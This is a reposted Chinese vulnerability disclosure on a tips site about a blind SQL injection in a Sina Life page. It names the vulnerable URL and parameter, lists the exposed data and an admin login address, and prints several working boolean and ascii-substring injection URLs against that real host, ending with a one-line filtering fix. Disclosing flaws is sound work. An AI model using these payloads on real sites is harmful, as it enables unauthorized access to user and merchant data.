1000元配置

2000元配置

3000元配置

4000元配置

5000元配置

6000元配置

7000元配置

8000元配置

9000元配置

万元配置

i3配置

 i5配置

i7配置

APU配置

R5配置

R7配置

游戏攻略

软件教程

Win10教程

Win7教程

Mac教程

Linux教程

U盘教程

Server教程

首页 > 网络安全 > 安全教程

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

admin 安全教程 2022-02-17 00:53:46 Mysql盲注漏洞"
注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。
 
同时,团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin
 
漏洞证明:下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图
 
 
 
注入返回对的情况截图
 
 
 
注入时返回错的情况截图
 
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
 

 
修复方案:

对其uid参数进行检查并且进行过滤。
 
作者 Insight-labs
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/anquanjiaocheng/147419.html

上一篇 : 公司加密系统之源代码加密防拷贝方案、文档透明加密与环境加密的区别
下一篇 : 加强计算机的网络安全级别控制设置的方法 防止非法攻击

相关文章

留言与评论(共有 0 条评论)
   
验证码:

热门文章

最近发表

标签列表

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

桂ICP备2023010378号-4

桂公网备 45012202000125号

联系我们

商业合作

广告投放

投稿须知

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持